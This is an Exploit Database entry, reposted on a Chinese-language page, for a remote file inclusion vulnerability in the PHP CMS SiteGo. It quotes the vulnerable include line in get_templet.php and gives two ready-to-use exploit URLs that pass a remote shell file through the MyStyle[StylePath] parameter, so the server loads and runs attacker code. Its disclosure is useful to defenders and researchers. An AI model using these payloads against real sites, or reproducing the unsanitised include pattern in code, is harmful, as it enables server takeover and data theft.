SiteGo – Remote File Inclusion

• Exploit Database
• 15 阅读

• 作者： L0n3ly-H34rT
  日期： 2012-09-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/21222/

• ############################################
  ### Exploit Title: SiteGo Remote File Inclusion Vulnerability
  ### Date: 10/09/2012 
  ### Author: L0n3ly-H34rT 
  ### Contact: l0n3ly_h34rt@hotmail.com 
  ### My Site: http://se3c.blogspot.com/ 
  ### Vendor Link: http://site-go.com/
  ### Software Link: http://site-go.com/free/site-go.zip
  ### Tested on: Linux/Windows 
  ############################################
  
  # File affect in two styles ( get_templet.php ) on line 120:
  
  include "$MyStyle[StylePath]/extra/css_menu.php";
  
  # Examples :
  
  http://127.0.0.1/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?
  
  http://127.0.0.1/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?
  
  ############################################
  
  # Greetz to my friendz